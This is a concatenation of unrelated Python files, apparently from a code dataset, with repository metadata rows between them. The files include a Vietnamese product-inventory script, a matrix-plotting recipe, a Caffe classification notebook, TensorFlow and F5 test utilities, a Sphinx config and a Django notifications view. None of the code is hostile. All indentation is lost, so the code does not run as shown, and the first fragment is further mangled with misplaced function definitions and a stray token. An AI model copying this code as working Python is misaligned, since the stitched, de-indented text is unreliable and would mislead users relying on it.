print("*** CẬP NHẬT THÔNG TIN SẢN PHẨM ***")
print("Nhập ID sản phẩm cần sửa")
Id = int(input())
product = FindProductDuplicate(Id)
if product == False:
print("Không tìm thấy sản phẩm ID = ", Id)
else:
print("""Bạn muốn cập nhật mục nào ? :
0. Thoát.
1. Tên sản phẩm.
2. Thương hiệu sản phẩm.
3. Giá sản phẩm
4. Size giày.
5. Số lượng.
6. Năm xuất bản. """)
action = 0
while action >= 0:
if action == 1:
UpdateProductName()
elif action == 2:
UpdateProductBrand()
elif action == 3:
UpdateProductPrice()
elif action == 4:
UpdateProductSize()
elif action == 5:
UpdateProductQuatity()
elif action == 6:
UpdateProductYear()
def UpdateProductName():
print("Nhập tên sản phẩm")
name_product = input()
product[1]['Product_name'] = name_product
def UpdateProductBrand():
print("Nhập thương hiệu của sản phẩm")
name_product = input()
product[1]['Brand'] = name_product
def UpdateProductPrice():
print("Nhập giá mới của sản phẩm")
name_product = float(input())
product[1]['Price'] = name_product
def UpdateProductSize():
print("Nhập size của sản phẩm")
name_product = input()
product[1]['Size'] = name_product
def UpdateProductYear():
print("Nhập năm sản xuất của sản phẩm")
name_product = int(input())
product[1]['Year'] = name_product
list_product.list_product[product[0]] = product[1]
def UpdateProductQuatity():
print("Nhập số lượng sản phẩm")
name_product = int(input())
product[1]['Quantity'] = name_product
list_product.list_product[product[0]] = product[1]
action = int(input("Bạn chọn mục cập nhật nào? "))
if action == 0:
print("Không cập nhật mục nào")
break
# Xóa sản phẩm
def DeleteProduct():
print("*** XÓA SẢN PHẨM ***")
print("Nhập ID sản phẩm cần xóa:")
Id = int(input())
product = FindProductDuplicate(Id)
if product != False:
list_product.list_product.remove(product[1])
print("Xóa sản phẩm thành công!")
else:
print("Không tìm thấy sản phẩm muốn xóa!")
# Tìm kiếm sản phẩm
def FindProductByName():
lí
print("*** TÌM KIẾM SẢN PHẨM ***")
print(list_product.list_product['Product_name'])
NameProduct = str(
input("Nhập tên sản phẩm hoặc tên thương hiệu bạn muốn tìm kiếm: ")).upper()
if list_product.list_product['Product_name'].upper() in NameProduct or list_product.list_product['Brand'].upper() in NameProduct:
for i in range(0, len(list_product.list_product)):
print("ID: ", list_product.list_product[i]['Id']),
print("Mã sản phẩm: ",
list_product.list_product[i]['Product_code']),
print("Tên sản phẩm: ",
list_product.list_product[i]['Product_name']),
print("Thương hiệu: ", list_product.list_product[i]['Brand']),
print("Giá: ", list_product.list_product[i]['Price']),
print("Năm xuất bản: ", list_product.list_product[i]['Year']),
print("Số lượng: ", list_product.list_product[i]['Quantity']),
print("Size giày: ", list_product.list_product[i]['Size'])
print("________________________________")
else:
print("Không tìm thấy sản phẩm này @@".upper())
| [
"phanthituyngoc1995@gmail.com"
] | phanthituyngoc1995@gmail.com |
b89b38a5777080f39b5b0af78beb817fc594e3fe | 50008b3b7fb7e14f793e92f5b27bf302112a3cb4 | /recipes/Python/390208_Matlablike_spy_pcolor/recipe-390208.py | af0402c8845b6bd612d208af863b90832966c331 | [
"MIT",
"Python-2.0"
] | permissive | betty29/code-1 | db56807e19ac9cfe711b41d475a322c168cfdca6 | d097ca0ad6a6aee2180d32dce6a3322621f655fd | refs/heads/master | 2023-03-14T08:15:47.492844 | 2021-02-24T15:39:59 | 2021-02-24T15:39:59 | 341,878,663 | 0 | 0 | MIT | 2021-02-24T15:40:00 | 2021-02-24T11:31:15 | Python | UTF-8 | Python | false | false | 3,546 | py | def spy_matrix_pil(A,fname='tmp.png',cutoff=0.1,do_outline=0,
height=300,width=300):
"""\
Use a matlab-like 'spy' function to display the large elements
of a matrix using the Python Imaging Library.
Arguments:
A Input Numpy matrix
fname Output filename to which to dump the graphics (default 'tmp.png')
cutoff Threshold value for printing an element (default 0.1)
do_outline Whether or not to print an outline around the block (default 0)
height The height of the image (default 300)
width The width of the image (default 300)
Example:
>>> from Numeric import identity,Float
>>> a = identity(10,Float)
>>> spy_matrix_pil(a)
"""
import Image,ImageDraw
img = Image.new("RGB",(width,height),(255,255,255))
draw = ImageDraw.Draw(img)
n,m = A.shape
if n>width or m>height:
raise "Rectangle too big %d %d %d %d" % (n,m,width,height)
for i in range(n):
xmin = width*i/float(n)
xmax = width*(i+1)/float(n)
for j in range(m):
ymin = height*j/float(m)
ymax = height*(j+1)/float(m)
if abs(A[i,j]) > cutoff:
if do_outline:
draw.rectangle((xmin,ymin,xmax,ymax),fill=(0,0,255),
outline=(0,0,0))
else:
draw.rectangle((xmin,ymin,xmax,ymax),fill=(0,0,255))
img.save(fname)
return
def pcolor_matrix_pil(A,fname='tmp.png',do_outline=0,
height=300,width=300):
"""\
Use a matlab-like 'pcolor' function to display the large elements
of a matrix using the Python Imaging Library.
Arguments:
A Input Numpy matrix
fname Output filename to which to dump the graphics (default 'tmp.png')
do_outline Whether or not to print an outline around the block (default 0)
height The height of the image (default 300)
width The width of the image (default 300)
Example:
>>> from Numeric import identity,Float
>>> a = identity(10,Float)
>>> pcolor_matrix_pil(a)
"""
import Image,ImageDraw
img = Image.new("RGB",(width,height),(255,255,255))
draw = ImageDraw.Draw(img)
mina = min(min(A))
maxa = max(max(A))
n,m = A.shape
if n>width or m>height:
raise "Rectangle too big %d %d %d %d" % (n,m,width,height)
for i in range(n):
xmin = width*i/float(n)
xmax = width*(i+1)/float(n)
for j in range(m):
ymin = height*j/float(m)
ymax = height*(j+1)/float(m)
color = get_color(A[i,j],mina,maxa)
if do_outline:
draw.rectangle((xmin,ymin,xmax,ymax),fill=color,
outline=(0,0,0))
else:
draw.rectangle((xmin,ymin,xmax,ymax),fill=color)
img.save(fname)
return
def get_color(a,cmin,cmax):
"""\
Convert a float value to one of a continuous range of colors.
Rewritten to use recipe 9.10 from the Python Cookbook.
"""
import math
try: a = float(a-cmin)/(cmax-cmin)
except ZeroDivisionError: a=0.5 # cmax == cmin
blue = min((max((4*(0.75-a),0.)),1.))
red = min((max((4*(a-0.25),0.)),1.))
green = min((max((4*math.fabs(a-0.5)-1.,0)),1.))
return '#%1x%1x%1x' % (int(15*red),int(15*green),int(15*blue))
from Numeric import identity,Float
a = identity(10,Float)
spy_matrix_pil(a)
pcolor_matrix_pil(a,'tmp2.png')
| [
"betty@qburst.com"
] | betty@qburst.com |
9166bba17e84a36d0e3627b66fc47d717a04d0ec | d3a8892f7e8a9d7767b3d797b0274004bf53e109 | /caffe/examples/notebook/original/brewing-logreg.py | 288d437ed475c854b70fc17a5e97ba4a9b78cde9 | [
"LicenseRef-scancode-generic-cla",
"BSD-2-Clause",
"LicenseRef-scancode-public-domain",
"BSD-3-Clause"
] | permissive | QI1002/machinelearning | 27d3217430c3440fce81f42e70aa88762dd9529c | 8daa4a54a5010ec702cb56b56f6373f5f09c891b | refs/heads/master | 2020-05-23T12:44:09.767397 | 2019-05-15T12:36:06 | 2019-05-15T12:36:06 | 186,762,814 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,606 | py | # based on Ipython Notebook script in https://github.com/QI1002/caffe/blob/master/examples/brewing-logreg.ipynb
import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline
import os
os.chdir('..')
import sys
sys.path.insert(0, './python')
import caffe
import os
import h5py
import shutil
import tempfile
import sklearn
import sklearn.datasets
import sklearn.linear_model
import pandas as pd
X, y = sklearn.datasets.make_classification(
n_samples=10000, n_features=4, n_redundant=0, n_informative=2,
n_clusters_per_class=2, hypercube=False, random_state=0
)
# Split into train and test
X, Xt, y, yt = sklearn.cross_validation.train_test_split(X, y)
# Visualize sample of the data
ind = np.random.permutation(X.shape[0])[:1000]
df = pd.DataFrame(X[ind])
_ = pd.scatter_matrix(df, figsize=(9, 9), diagonal='kde', marker='o', s=40, alpha=.4, c=y[ind])
%%timeit
# Train and test the scikit-learn SGD logistic regression.
clf = sklearn.linear_model.SGDClassifier(
loss='log', n_iter=1000, penalty='l2', alpha=5e-4, class_weight='auto')
clf.fit(X, y)
yt_pred = clf.predict(Xt)
print('Accuracy: {:.3f}'.format(sklearn.metrics.accuracy_score(yt, yt_pred)))
# Write out the data to HDF5 files in a temp directory.
# This file is assumed to be caffe_root/examples/hdf5_classification.ipynb
dirname = os.path.abspath('./examples/hdf5_classification/data')
if not os.path.exists(dirname):
os.makedirs(dirname)
train_filename = os.path.join(dirname, 'train.h5')
test_filename = os.path.join(dirname, 'test.h5')
# HDF5DataLayer source should be a file containing a list of HDF5 filenames.
# To show this off, we'll list the same data file twice.
with h5py.File(train_filename, 'w') as f:
f['data'] = X
f['label'] = y.astype(np.float32)
with open(os.path.join(dirname, 'train.txt'), 'w') as f:
f.write(train_filename + '\n')
f.write(train_filename + '\n')
# HDF5 is pretty efficient, but can be further compressed.
comp_kwargs = {'compression': 'gzip', 'compression_opts': 1}
with h5py.File(test_filename, 'w') as f:
f.create_dataset('data', data=Xt, **comp_kwargs)
f.create_dataset('label', data=yt.astype(np.float32), **comp_kwargs)
with open(os.path.join(dirname, 'test.txt'), 'w') as f:
f.write(test_filename + '\n')
from caffe import layers as L
from caffe import params as P
def logreg(hdf5, batch_size):
# logistic regression: data, matrix multiplication, and 2-class softmax loss
n = caffe.NetSpec()
n.data, n.label = L.HDF5Data(batch_size=batch_size, source=hdf5, ntop=2)
n.ip1 = L.InnerProduct(n.data, num_output=2, weight_filler=dict(type='xavier'))
n.accuracy = L.Accuracy(n.ip1, n.label)
n.loss = L.SoftmaxWithLoss(n.ip1, n.label)
return n.to_proto()
train_net_path = 'examples/hdf5_classification/logreg_auto_train.prototxt'
with open(train_net_path, 'w') as f:
f.write(str(logreg('examples/hdf5_classification/data/train.txt', 10)))
test_net_path = 'examples/hdf5_classification/logreg_auto_test.prototxt'
with open(test_net_path, 'w') as f:
f.write(str(logreg('examples/hdf5_classification/data/test.txt', 10)))
from caffe.proto import caffe_pb2
def solver(train_net_path, test_net_path):
s = caffe_pb2.SolverParameter()
# Specify locations of the train and test networks.
s.train_net = train_net_path
s.test_net.append(test_net_path)
s.test_interval = 1000 # Test after every 1000 training iterations.
s.test_iter.append(250) # Test 250 "batches" each time we test.
s.max_iter = 10000 # # of times to update the net (training iterations)
# Set the initial learning rate for stochastic gradient descent (SGD).
s.base_lr = 0.01
# Set `lr_policy` to define how the learning rate changes during training.
# Here, we 'step' the learning rate by multiplying it by a factor `gamma`
# every `stepsize` iterations.
s.lr_policy = 'step'
s.gamma = 0.1
s.stepsize = 5000
# Set other optimization parameters. Setting a non-zero `momentum` takes a
# weighted average of the current gradient and previous gradients to make
# learning more stable. L2 weight decay regularizes learning, to help prevent
# the model from overfitting.
s.momentum = 0.9
s.weight_decay = 5e-4
# Display the current training loss and accuracy every 1000 iterations.
s.display = 1000
# Snapshots are files used to store networks we've trained. Here, we'll
# snapshot every 10K iterations -- just once at the end of training.
# For larger networks that take longer to train, you may want to set
# snapshot < max_iter to save the network and training state to disk during
# optimization, preventing disaster in case of machine crashes, etc.
s.snapshot = 10000
s.snapshot_prefix = 'examples/hdf5_classification/data/train'
# We'll train on the CPU for fair benchmarking against scikit-learn.
# Changing to GPU should result in much faster training!
s.solver_mode = caffe_pb2.SolverParameter.CPU
return s
solver_path = 'examples/hdf5_classification/logreg_solver.prototxt'
with open(solver_path, 'w') as f:
f.write(str(solver(train_net_path, test_net_path)))
%%timeit
caffe.set_mode_cpu()
solver = caffe.get_solver(solver_path)
solver.solve()
accuracy = 0
batch_size = solver.test_nets[0].blobs['data'].num
test_iters = int(len(Xt) / batch_size)
for i in range(test_iters):
solver.test_nets[0].forward()
accuracy += solver.test_nets[0].blobs['accuracy'].data
accuracy /= test_iters
print("Accuracy: {:.3f}".format(accuracy))
!./build/tools/caffe train -solver examples/hdf5_classification/logreg_solver.prototxt
from caffe import layers as L
from caffe import params as P
def nonlinear_net(hdf5, batch_size):
# one small nonlinearity, one leap for model kind
n = caffe.NetSpec()
n.data, n.label = L.HDF5Data(batch_size=batch_size, source=hdf5, ntop=2)
# define a hidden layer of dimension 40
n.ip1 = L.InnerProduct(n.data, num_output=40, weight_filler=dict(type='xavier'))
# transform the output through the ReLU (rectified linear) non-linearity
n.relu1 = L.ReLU(n.ip1, in_place=True)
# score the (now non-linear) features
n.ip2 = L.InnerProduct(n.ip1, num_output=2, weight_filler=dict(type='xavier'))
# same accuracy and loss as before
n.accuracy = L.Accuracy(n.ip2, n.label)
n.loss = L.SoftmaxWithLoss(n.ip2, n.label)
return n.to_proto()
train_net_path = 'examples/hdf5_classification/nonlinear_auto_train.prototxt'
with open(train_net_path, 'w') as f:
f.write(str(nonlinear_net('examples/hdf5_classification/data/train.txt', 10)))
test_net_path = 'examples/hdf5_classification/nonlinear_auto_test.prototxt'
with open(test_net_path, 'w') as f:
f.write(str(nonlinear_net('examples/hdf5_classification/data/test.txt', 10)))
solver_path = 'examples/hdf5_classification/nonlinear_logreg_solver.prototxt'
with open(solver_path, 'w') as f:
f.write(str(solver(train_net_path, test_net_path)))
%%timeit
caffe.set_mode_cpu()
solver = caffe.get_solver(solver_path)
solver.solve()
accuracy = 0
batch_size = solver.test_nets[0].blobs['data'].num
test_iters = int(len(Xt) / batch_size)
for i in range(test_iters):
solver.test_nets[0].forward()
accuracy += solver.test_nets[0].blobs['accuracy'].data
accuracy /= test_iters
print("Accuracy: {:.3f}".format(accuracy))
!./build/tools/caffe train -solver examples/hdf5_classification/nonlinear_logreg_solver.prototxt
# Clean up (comment this out if you want to examine the hdf5_classification/data directory).
shutil.rmtree(dirname)
| [
"alanchang544@gmail.com"
] | alanchang544@gmail.com |
832d35a685c7bd0a682533fa880372e0d17ad7b8 | 12ddeca149e1a95aa404d494a8856536c3a7022b | /mesh_tensorflow/utils.py | 8a4fc9aa67c1d2f8b7d8c4e971a75021fe2c75b3 | [
"Apache-2.0"
] | permissive | brettkoonce/mesh | bbe1c2c08aaa4ce50bd91497c122f1a9f252fb27 | 07417c92a061978f5b6ec10af5ebb6aa48de1d7e | refs/heads/master | 2020-04-08T10:29:55.910960 | 2018-11-25T02:31:42 | 2018-11-25T02:32:56 | 159,271,264 | 0 | 0 | null | 2018-11-27T03:35:58 | 2018-11-27T03:35:58 | null | UTF-8 | Python | false | false | 2,209 | py | # coding=utf-8
# Copyright 2018 The Mesh TensorFlow Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common utilities for Mesh TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import heapq
import tensorflow as tf
from tensorflow.python.framework import ops
@contextlib.contextmanager
def outside_all_rewrites():
with ops.control_dependencies(None):
yield
class BalancedVariablePlacer(object):
"""Place the variable on different device and blance the memory usage."""
def __init__(self, devices, init_usage=None):
init_usage = init_usage if init_usage else [0] * len(devices)
assert len(devices) == len(init_usage)
self._mem_device_heap = list(zip(init_usage, devices))
heapq.heapify(self._mem_device_heap)
self._last_device = devices[0]
def device_function(self, var):
"""Choose a device for the input variable.
Args:
var: an Variable.
Returns:
The device for placing the var.
"""
if var.type not in ('Variable', 'VariableV2', 'VarHandleOp'):
tf.logging.debug('Place {} on last device: {}.'.format(
var.name, self._last_device))
return self._last_device
shape = tf.TensorShape(var.get_attr('shape'))
assert shape.num_elements() is not None
size = tf.DType(var.get_attr('dtype')).size
mem, device = heapq.heappop(self._mem_device_heap)
mem += shape.num_elements() * size
heapq.heappush(self._mem_device_heap, (mem, device))
tf.logging.debug('Place variable {} on {} and consumes {} Bytes.'.format(
var.name, device, mem))
self._last_device = device
return device
| [
"copybara-piper@google.com"
] | copybara-piper@google.com |
7710a9642e9f3d373a1295f5cfb9c1067f40da35 | be4892e723db5039c56f961e117cb95258168eca | /lectures/lecture6/mysqrt.py | 6c1b85a74369b42e6707344be08f3d44fe3a4d16 | [] | no_license | Physicist91/uwhpsc | 121ebef0d0cd9fd7b038f97b4cb93a1f2272844a | d3ce5217796c82b19c131a04d7aecad1b9c4bae2 | refs/heads/master | 2021-01-10T21:12:00.235642 | 2014-04-05T23:29:07 | 2014-04-05T23:29:07 | 19,096,883 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,195 | py | """
Module for approximating sqrt.
This is a sample module developed in earlier lectures.
"""
def sqrt2(x, debug=False):
"""
more details.
"""
from numpy import nan
if x==0.:
return 0.
elif x<0:
print "*** Error, x must be nonnegative"
return nan
assert x>0. and type(x) is float, "Unrecognized input"
s = 1.
kmax = 100
tol = 1.e-14
for k in range(kmax):
if debug:
print "Before iteration %s, s = %20.15f" % (k,s)
s0 = s
s = 0.5 * (s + x/s)
delta_s = s - s0
if abs(delta_s / x) < tol:
break
if debug:
print "After %s iterations, s = %20.15f" % (k+1,s)
return s
def test():
from numpy import sqrt
xvalues = [0., 2., 100., 10000., 1.e-4]
for x in xvalues:
print "Testing with x = %20.15e" % x
s = sqrt2(x)
s_numpy = sqrt(x)
print " s = %20.15e, numpy.sqrt = %20.15e" \
% (s, s_numpy)
assert abs(s - s_numpy) < 1e-14, \
"Disagree for x = %20.15e" % x
if __name__ == "__main__":
print "Running test... "
test()
| [
"rjl@ned"
] | rjl@ned |
0030964604d33aa135c50d750f448c4688055868 | 3256af0d6c19732bb84b256a9f792aaf7f3d901a | /f5/bigip/tm/asm/policies/test/functional/test_session_tracking.py | 787fdfeaad06ce0b34a159e408f247c5a80fe15b | [
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] | permissive | F5Networks/f5-common-python | 73e33ea489d989399d205077163f24ce584d83b9 | 3050df0079c2426af99b9a1b8f93d0b512468ff4 | refs/heads/development | 2023-08-29T10:11:23.713392 | 2022-09-21T02:45:03 | 2022-09-21T02:45:03 | 45,062,555 | 286 | 180 | Apache-2.0 | 2023-05-12T23:13:03 | 2015-10-27T18:48:06 | Python | UTF-8 | Python | false | false | 2,340 | py | # Copyright 2017 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
from distutils.version import LooseVersion
from f5.sdk_exception import UnsupportedOperation
@pytest.mark.skipif(
LooseVersion(pytest.config.getoption('--release')) < LooseVersion('11.6.0'),
reason='This collection is fully implemented on 11.6.0 or greater.'
)
class TestSessionTracking(object):
def test_update_raises(self, policy):
with pytest.raises(UnsupportedOperation):
policy.session_tracking.update()
def test_load(self, policy):
r1 = policy.session_tracking.load()
assert r1.kind == 'tm:asm:policies:session-tracking:session-awareness-settingsstate'
assert r1.sessionTrackingConfiguration['enableSessionAwareness'] is False
tmp_2 = {'enableSessionAwareness': True}
r1.modify(sessionTrackingConfiguration=tmp_2)
assert r1.sessionTrackingConfiguration['enableSessionAwareness'] is True
r2 = policy.session_tracking.load()
assert r1.kind == r2.kind
assert r1.sessionTrackingConfiguration == r2.sessionTrackingConfiguration
def test_refresh(self, policy):
r1 = policy.session_tracking.load()
assert r1.kind == 'tm:asm:policies:session-tracking:session-awareness-settingsstate'
assert r1.sessionTrackingConfiguration['enableSessionAwareness'] is False
r2 = policy.session_tracking.load()
assert r1.kind == r2.kind
assert r1.sessionTrackingConfiguration == r2.sessionTrackingConfiguration
tmp_2 = {'enableSessionAwareness': True}
r2.modify(sessionTrackingConfiguration=tmp_2)
assert r2.sessionTrackingConfiguration['enableSessionAwareness'] is True
r1.refresh()
assert r1.sessionTrackingConfiguration == r2.sessionTrackingConfiguration
| [
"caphrim007@gmail.com"
] | caphrim007@gmail.com |
3dacd79b61a449dd121c4692ecef1e73c0a3611d | 779291cb83ec3cab36d8bb66ed46b3afd4907f95 | /library_strategy-wf/scripts/plot_umap_library_strategy.py | 8893a1ca40907af4f128ed47502fc90d159e6127 | [] | no_license | Shengqian95/ncbi_remap | ac3258411fda8e9317f3cdf951cc909cc0f1946e | 3f2099058bce5d1670a672a69c13efd89d538cd1 | refs/heads/master | 2023-05-22T06:17:57.900135 | 2020-11-01T17:16:54 | 2020-11-01T17:16:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,713 | py | """UMAP of Library Strategy"""
import sys
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
sys.path.insert(0, "../src")
from ncbi_remap.plotting import style_use
CATEGORIES = ["RNA-Seq", "EST", "WGS", "ChIP-Seq", "Other"]
COLORS = ["C0", "C1", "C2", "C4", "lightgray"]
ZORDER = [4, 3, 2, 1, 0]
SCATTER_STYLE = dict(s=10, edgecolors="w", linewidths=0.2, rasterized=True)
def main():
style_use(snakemake.params.get("style", "sra"))
embeddings = wrangle_data()
ax = plot(embeddings)
plt.savefig(snakemake.output[0])
def wrangle_data():
labels = (
pd.read_parquet(snakemake.input.labels)
.library_strategy.squeeze()
.map(lambda x: x if x in CATEGORIES else "Other")
)
return pd.read_parquet(snakemake.input.umap).join(labels)
def plot(embeddings):
for cat, color, zorder in zip(CATEGORIES, COLORS, ZORDER):
df = embeddings.query(f"library_strategy == '{cat}'")
plt.scatter(df.UMAP1, df.UMAP2, c=color, label=cat, zorder=zorder, **SCATTER_STYLE)
ax = plt.gca()
ax.set(xlabel="UMAP 1", ylabel="UMAP 2")
sns.despine(ax=ax, left=True, bottom=True)
ax.yaxis.set_visible(False)
ax.xaxis.set_visible(False)
plt.legend(loc="upper left")
return ax
if __name__ == "__main__":
if "snakemake" not in locals() or not hasattr(snakemake, "scriptdir"):
from ncbi_remap.mock import MockSnake
snakemake = MockSnake(
input=dict(
umap="../../output/library_strategy-wf/umap_prealn_features.parquet",
labels="../../output/library_strategy-wf/sra_strategy_selection.parquet",
),
output="",
)
main()
| [
"justin.m.fear@gmail.com"
] | justin.m.fear@gmail.com |
d8ca834b99ba70263bf23cc4cca4378f4ddc1fc7 | 6aee7149a16a71389e0916de1854f4edea026c2b | /docs/conf.py | ec1c141aa03b02802683dd91900e56f31946a7a8 | [
"BSD-2-Clause"
] | permissive | orionzhou/maize | d5e3c66af285d5d3a490fe09e85f840bd033240a | 605c895c397c9f614955a6df8eed0edc553f543d | refs/heads/main | 2022-12-27T02:08:26.747564 | 2022-11-24T07:57:30 | 2022-11-24T07:57:30 | 11,537,821 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,192 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# robin documentation build configuration file, created by
# sphinx-quickstart on Sun Dec 11 23:07:57 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'robin'
copyright = '2016, Peng Zhou'
author = 'Peng Zhou'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinxdoc'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'robindoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'robin.tex', 'robin Documentation',
'Peng Zhou', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'robin', 'robin Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'robin', 'robin Documentation',
author, 'robin', 'One line description of project.',
'Miscellaneous'),
]
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
| [
"zhoupenggeni@gmail.com"
] | zhoupenggeni@gmail.com |
1f956806ded26833499f7cf94f5aa6c07baf85ca | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_62/226.py | 7ad140bdb3f8909e25cea0499824da525e9f42ab | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 364 | py | fi=open("A-large.in")#")
import sys
sys.stdout=open("out.out",'w')
T=int(fi.readline())
for i in range(T):
N=int(fi.readline())
lst=[map(int,fi.readline().split()) for j in range(N)]
cnt=0
for j in range(N):
for k in range(j+1,N):
cnt+=(lst[k][0]>lst[j][0])==(lst[k][1]<lst[j][1])
print "Case #%d: %d"%(i+1,cnt)
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
d2e0473e0664d8e1a1e333368970ecc639a0840e | 1e8142725aa06844713d18fa38c6779aff8f8171 | /tndata_backend/notifications/views.py | cfeca79f817dd6db55ce8cd517ebe98b2e9b6884 | [
"MIT"
] | permissive | tndatacommons/tndata_backend | 8f4db3e5cf5272901c9087a85e21d7560240bb3b | 3d22179c581ab3da18900483930d5ecc0a5fca73 | refs/heads/master | 2020-12-03T07:53:17.339769 | 2017-03-27T06:18:58 | 2017-03-27T06:18:58 | 68,407,220 | 1 | 2 | null | 2017-03-27T06:18:59 | 2016-09-16T18:59:16 | Python | UTF-8 | Python | false | false | 6,049 | py | from collections import defaultdict
from datetime import datetime, timedelta
from django.contrib.auth import get_user_model
from django.contrib.auth.decorators import login_required, user_passes_test
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.http import JsonResponse
from django.shortcuts import get_object_or_404, render, redirect
from django.utils import timezone
from . import queue
from .forms import GCMMessageForm
from .models import GCMMessage
@login_required
def send_message(request):
"""A quick & easy way to send test notifications."""
if request.method == "POST":
form = GCMMessageForm(request.POST)
if form.is_valid():
msg = form.save(commit=False)
msg.user = request.user
msg.deliver_on = timezone.now()
msg.priority = GCMMessage.HIGH
msg.save()
msg.send()
messages.success(request, "Your notification has been sent")
return redirect(reverse("notifications:view", args=[msg.id]))
else:
form = GCMMessageForm()
context = {
'form': form,
}
return render(request, 'notifications/send_message.html', context)
@login_required
def view_message(request, message_id):
msg = get_object_or_404(GCMMessage, pk=message_id)
return render(request, 'notifications/view_message.html', {'message': msg})
@user_passes_test(lambda u: u.is_staff, login_url='/')
def dashboard(request):
"""A simple dashboard for enqueued GCM notifications."""
devices = None
User = get_user_model()
# If we have specified a user, show their Queue details.
date = request.GET.get('date', None) or None
if date is None:
date = timezone.now().date()
else:
date = datetime.strptime(date, "%Y-%m-%d").date()
user = None
email = request.GET.get('user', None)
user_queues = [] # Prioritized user queue
try:
user = User.objects.get(email__icontains=email)
devices = user.gcmdevice_set.count()
user_queues.append(queue.UserQueue.get_data(user, date=date))
date = date + timedelta(days=1)
user_queues.append(queue.UserQueue.get_data(user, date=date))
except (User.DoesNotExist, ValueError, TypeError):
if user is not None:
messages.warning(request, "No data found for '{}'".format(user))
except User.MultipleObjectsReturned:
messages.warning(request, "Multiple Users found for '{}'".format(user))
if user:
# Get all the enqueued jobs, & keep a list of the Job.ID values.
jobs = queue.messages()
